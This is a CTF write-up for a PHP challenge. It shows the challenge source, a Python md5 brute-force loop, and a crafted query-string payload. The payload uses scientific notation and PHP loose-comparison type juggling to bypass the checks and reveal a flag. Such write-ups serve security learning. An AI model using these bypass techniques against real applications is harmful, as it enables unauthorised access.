Not much nonsense, opening the environment is a large section of php code, for a novice like me, it is still difficult! I can only ponder the idea of constructing the payload a little bit, and of course I also referred to other people's wp on the Internet. Recording it down is also to deepen my impression. If there is anything, I can look it up, so as to learn the new by reviewing the past.
<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
$a = $_GET['a'];
$b = $_GET['b'];
if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
$key1 = 1;
}else{
die("Emmm...再想想");
}
}else{
die("Emmm...");
}
$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
$d = array_search("DGGJ", $c["n"]);
$d === false?die("no..."):NULL;
foreach($c["n"] as $key=>$val){
$val==="DGGJ"?die("no......"):NULL;
}
$key2 = 1;
}else{
die("no hack");
}
}else{
die("no");
}
if($key1 && $key2){
include "Hgfks.php";
echo "You're right"."\n";
echo $flag;
}
?> Emmm...Look at the last paragraph, when the values of key1 and key2 are both 1, the value of flag will be returned. And key1 and key2 need to be assigned a value of 1 only when the three parameters a, b, and c meet the conditions.
To analyze section by section, the first is the requirements of the two parameters a and b.
if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
$key1 = 1;
}else{
die("Emmm...再想想");
}
}else{
die("Emmm...");
}The value of a needs to be greater than 6000000 but the length cannot be greater than 3. It is easy to think of expressing it in scientific notation, such as 1e8 and 1e9.
The last 6 digits of the md5 value of b must be "8b184b". It seems that there is no better way to write scripts to blast this. ==>md5(53724)
import hashlib
for i in range(100000):
b=i.to_bytes(22, 'big')
m=hashlib.md5(str(i).encode()).hexdigest()
if(m[-6:]=="8b184b"):
print(i)
print(m)
then look at c
$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
$d = array_search("DGGJ", $c["n"]);
$d === false?die("no..."):NULL;
foreach($c["n"] as $key=>$val){
$val==="DGGJ"?die("no......"):NULL;
}
$key2 = 1;
}else{
die("no hack");
}
}else{
die("no");
}c is a parameter in json format, and the value corresponding to the m key is not a number and needs to be greater than 2022
is_numeric determines whether the parameter is a numeric type in php, whether it is a number or a string of numbers. "2222a" will be evaluated as false.
If "2222a" is compared with 2022, it can be regarded as a comparison between 2222 and 2022; if it is "a2222", it will be regarded as 0.
Therefore, the parameter corresponding to the m key here can be "2333abc", which can satisfy the above conditions at the same time.
The value corresponding to the n key is an array, the number is 2, and the first element in the array is also an array, that is, [[...],...]
Looking further down, if there is no DGGJ in the corresponding value of the n key, it will be judged as false and die directly, but the following says that if DGGJ is traversed, it will also be directly die...
The array_search() function is the same as in_array() to find a key value in the array. If the value is found, the key of the matching element is returned. Returns false if not found. In fact, it is equivalent to comparing the key value with "DGGJ". When a number is compared with a string/character in PHP, the system first tries to convert the string/character into an integer/floating point type, and then compares . So when the value corresponding to the n key is a number and contains the number 0, DGGJ is regarded as 0, and DGGJ can be found in "wherein" and returns True.
So you can construct c as {"m":"2333abc","n":[[0,1],0]}
To sum up
Construct the payload:
http://ip:port/?a=1e9&b=53724&c={"m":"2333abc","n":[[0,1],0]}
